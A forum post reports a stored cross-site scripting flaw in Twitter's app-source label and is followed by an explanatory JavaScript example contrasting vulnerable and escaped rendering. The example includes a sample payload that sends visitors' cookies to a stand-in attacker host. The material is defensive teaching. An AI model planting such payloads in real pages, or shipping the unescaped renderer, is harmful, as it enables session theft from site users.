There isn’t much talk of Twitter on these forums, but a friend of mine has just discovered (yesterday) a rather embarrassing vulnerability in Twitter.
Details here
http://www.davidnaylor.co.uk/twitter-exploit-still-works.html
Basically, when you tweet, the app you post from gets to add its name to the message, like TweetDeck, TwitterFox, HootSuite or web, so people know where you are tweeting from.
It seems that Twitter didn’t check the input on this, and so a malicious user can create a simple Twitter app to run their own code whenever you see a message from them.
So if you see a message from a malicious user and are logged into the Twitter.com site, they can run code to steal your Twitter login details, delete your tweets or tweet as you!
As a programmer myself I’m pretty disappointed that they forgot the number one rule for client interaction – never, ever trust user input.
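To make the "never trust user input" point concrete, here is an added example (not Twitter's code, not from the linked article, and not the original poster's) of how an unescaped "posted from" label becomes stored cross-site scripting, beside a hardened version. The function names, the regex allowlist and the sample app name are all made up for illustration; the payload string is a constructed input, not something reported in the article.

```javascript
// Added example: an application "source" label rendered into every viewer's
// page. If the label is not escaped on output, whatever the app developer
// registered as their app name runs as HTML/JS in the viewer's browser.
// All names here are hypothetical; this is not Twitter's implementation.

// Constructed sample input: an app name chosen by a malicious developer.
const MALICIOUS_SOURCE =
  'web<script>document.location="http://attacker.invalid/?c="+document.cookie</script>';

// Escape the five characters that change meaning inside an HTML text node
// or a double/single-quoted attribute value.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable rendering: the tweet body is escaped, but the app name is
// concatenated straight in. A viewer who is logged in executes the script
// with their own session, which is exactly the scenario the post describes.
function renderTweetVulnerable(text, sourceName) {
  return '<p class="tweet">' + escapeHtml(text) +
    ' <span class="source">from ' + sourceName + '</span></p>';
}

// Defence 1: a conservative allowlist applied when the app name is
// registered. Letters, digits, space, dot, underscore and hyphen, 1-32 chars.
const SOURCE_NAME_RE = /^[A-Za-z0-9][A-Za-z0-9 ._-]{0,31}$/;

function isValidSourceName(sourceName) {
  return SOURCE_NAME_RE.test(sourceName);
}

// Defence 2: escape on output regardless of what validation did, so a
// name that slipped past registration (or a later rule change) still
// cannot inject markup. Names that fail the allowlist render as "unknown".
function renderTweetSafe(text, sourceName) {
  const label = isValidSourceName(sourceName) ? sourceName : 'unknown';
  return '<p class="tweet">' + escapeHtml(text) +
    ' <span class="source">from ' + escapeHtml(label) + '</span></p>';
}

// Quick demonstration when run directly.
console.log(renderTweetVulnerable('hello', MALICIOUS_SOURCE));
console.log(renderTweetSafe('hello', MALICIOUS_SOURCE));
console.log(renderTweetSafe('hello', 'TweetDeck'));
```

The two defences are deliberately independent: the allowlist limits what can be stored, and output escaping guarantees that even a stored value containing `<`, `>` or quotes is shown as text rather than interpreted as markup. Either alone would have prevented the bug described above; doing both means a mistake in one does not reopen it.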